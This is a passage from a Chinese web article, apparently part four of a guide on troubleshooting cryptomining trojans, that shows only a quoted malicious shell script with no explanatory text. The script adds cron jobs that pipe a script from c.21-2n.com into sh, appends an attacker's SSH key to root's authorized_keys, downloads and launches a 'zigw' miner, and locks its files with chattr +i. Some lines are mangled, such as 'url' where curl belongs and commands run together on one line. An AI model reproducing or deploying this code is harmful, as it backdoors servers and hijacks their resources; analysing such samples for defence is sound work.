江苏龙网

  1. 主页 > 生活百科 > >

如何排查常见挖矿木马( 四 )

木马


  chattr -i $cont
  if [ -f "$bbdir" ]   then
    [[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
   else
    [[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
  fi
  mkdir /root/.ssh
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
  [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
  ps -fe|grep zigw |grep -v grep  if [ $? -ne 0 ]   then
    cd /etc
    filesize=`ls -l zigw | awk '{ print $5 }'`
    file="/etc/zigw"
    if [ -f "$file" ]     then
      if [ "$filesize" -ne "1467080" ]       then
        chattr -i /etc/zigw
        rm -f zigw        if [ -f "$bbdir" ]        then
         curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw        elif [ -f "$bbdira" ]        then
         url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw        elif [ -f "$ccdir" ]        then
         wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw        elif [ -f "$ccdira" ]        then
         get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw        fi
      fi
     else
      if [ -f "$bbdir" ]      then
       curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw      elif [ -f "$bbdira" ]      then
       url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw      elif [ -f "$ccdir" ]      then
       wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw      elif [ -f "$ccdira" ]      then
       get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw      fi
    fi
    chmod 777 zigw
    sleep 1s
    ./zigw   else
    echo "runing....."
  fi
  chmod 777 /etc/zigw
  chattr +i /etc/zigw
  chmod 777 /etc/shz.sh
  chattr +i /etc/shz.sh
  shdir='/etc/shz.sh'
  if [ -f "$shdir" ]   then
    echo "exists shell"
   else
    if [ -f "$bbdir" ]    then
     curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh    elif [ -f "$bbdira" ]    then
     url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh    elif [ -f "$ccdir" ]    then
     wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh    elif [ -f "$ccdira" ]    then
     get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh    fi


推荐阅读


上一篇:knscha电容是什么牌子

下一篇:女人梦见洗头发是什么意思 梦见洗头发是什么意思 周公解梦